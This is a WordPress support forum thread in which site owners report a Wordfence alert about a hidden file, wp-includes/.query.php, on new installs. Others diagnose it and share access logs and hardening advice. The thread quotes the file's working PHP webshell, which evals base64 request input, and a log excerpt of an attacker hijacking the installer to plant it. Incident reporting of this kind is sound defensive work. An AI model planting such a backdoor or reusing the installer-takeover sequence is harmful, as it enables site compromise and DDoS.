Support » Plugin: Wordfence Security - Firewall & Malware Scan » Unknown file in WordPress core: wp-includes/.query.php

  • Resolved Mindas22

    (@mindas22)


    Hi, does it mean it was hacked?
    Wordfence found: Unknown file in WordPress core: wp-includes/.query.php

    Content of the files is:
    <?php if(isset($_REQUEST['a'])){if($_REQUEST['a']=="5499070099458808586"){if(isset($_REQUEST['b']))eval(base64_decode($_REQUEST['b']));}}

    Thank You!

Viewing 11 replies - 1 through 11 (of 11 total)
  • danielrufde

    (@danielrufde)

    Yes, that is a very simple webshell which can evaluate / execute code from $_POST[‘a’], $_GET[‘a’], $_COOKIE[‘a’]. See also https://www.php.net/manual/en/reserved.variables.request.php and https://www.php.net/manual/en/function.eval.php (eval is evil). So yes, the website is compromised / hacked.

    Thread Starter Mindas22

    (@mindas22)

    I tried new installation, new server. new url, fresh wordpress, same new popular premium theme “woodmart” from themeforest. Same plugins Classic editor, Safe SVG, Revslider etc.
    Created couple pages and same file .query.php appeared in the next few minutes.

    Then repeated the steps again one more time. (no file this time).

    danielrufde

    (@danielrufde)

    Well, you have to analyze how the attackers gained the access and how the files were created. Maybe revslider is outdated? Try searching in accesslog files and find out what exactly happened. The timestamps of the files can give you a hint.

    Plugin Support wfpeter

    (@wfpeter)

    Hi @mindas22, thanks for your question.

    There can be multiple attack vectors when a site is targeted that range from outdated plugins with an unpatched vulnerability to an insecure account on WordPress or within your hosting environment (database, cPanel, FTP etc.) It has even been known for another infected site on a shared hosting server to infect other sites hosted there: https://www.wordfence.com/blog/2021/06/service-vulnerabilities-shared-hosting-symlink-security-issue-still-widely-exploited-on-unpatched-servers/

    Besides all the routine WordPress admin, FTP, SSH, cPanel user passwords:

    1. Changing your MySQL password is critical. Make sure remote MySQL access from all connections is not enabled.
    2. Most critical may be changing wp-config.php to 600 permissions. This is preventative against the symlink vulnerability mentioned above that exposes that file to be read in default permissions, which allows direct access to the db from other infected sites on the server.
    3. Your default cPanel password should also be changed if you haven’t already. There’s a common account third-party billing panel out there called “WHMCS”, where the cPanel password is controlled from the account billing panel. Your host may be able to help with finding this if it’s not apparent whether it’s changed from within cPanel or that kind of external billing dashboard provided by your host.

    You can find site cleaning details here:

    https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence

    https://wordfence.com/learn/

    If you still have a copy of the affected file, you can always send it to samples @ wordfence . com for us to analyze. Please note that when attaching a file, ensure that you remove any database access credentials or keys/salts before sending.

    Thanks,

    Peter.

    I had this happen to a site I host as well.

    Within 10 minutes of setting up the new site, adding the DNS, and requesting a Let’s Encrypt Certificate, I had a foreign actor installing what appears to be fake WP plugin that then transitioned to this .query.php script and was eventually used to DDOS another hosting provider.

    Excerpt from the logs:

    185.59.x.x - - [11/Mar/2022:17:05:38 -0500] "GET /wp-admin/install.php HTTP/1.1" 200 13230
    185.59.x.x - - [11/Mar/2022:17:05:38 -0500] "POST /wp-admin/install.php?step=2 HTTP/1.1" 200 5001
    185.59.x.x - - [11/Mar/2022:17:05:40 -0500] "POST /wp-login.php HTTP/1.1" 302 -
    185.59.x.x - - [11/Mar/2022:17:05:41 -0500] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 200 26161
    185.59.x.x - - [11/Mar/2022:17:05:51 -0500] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 17775
    185.59.x.x - - [11/Mar/2022:17:05:52 -0500] "GET /wp-content/plugins/contact-form-maker/contact-form-maker.php?a=0&b=5768720944787703971 HTTP/1.1" 200 -
    185.59.x.x - - [11/Mar/2022:17:05:52 -0500] "POST /wp-includes/.query.php HTTP/1.1" 200 9

    Hi, I confirmed. 3 sites, new installation ready. Before complete installation, LE cert. requested. After hacked.
    I think because scan of new cert. in http://www.crt.sh.

    Vadim

    (@vadikcoma)

    We had exactly the same issue. Brand new site on dev server. Google indexing disabled.

    Everything installed from official repos on latest versions.

    WordPress
    Enfold theme
    Safe SVG
    Duplicate post

    2 days after website install file wp-includes/.query.php starts DDoS attack from our server.

    So far we have no idea now website got infected.

    Thread Starter Mindas22

    (@mindas22)

    I can see only pattern is same plugin Safe SVG so far.

    Ours got hit before we set a password on the installer. Logs provided above. Compare to your logs if they’re still around.

    Vadim

    (@vadikcoma)

    Please take a look at this thread:

    https://community.letsencrypt.org/t/hacked-new-wordpress-sites-because-le-is-created/175284

    It seems, that bots are checking when new domain is requesting SSL certificate and instantly attack domain. In case you have WordPress uploaded, but not installed yet – they use install and upload script.

    Hi !
    I have same problem. The file .query.php was created 1 minute after installation wordpress (I checked “stat” on linux console). Is possible avoid it?

Viewing 11 replies - 1 through 11 (of 11 total)
  • You must be logged in to reply to this topic.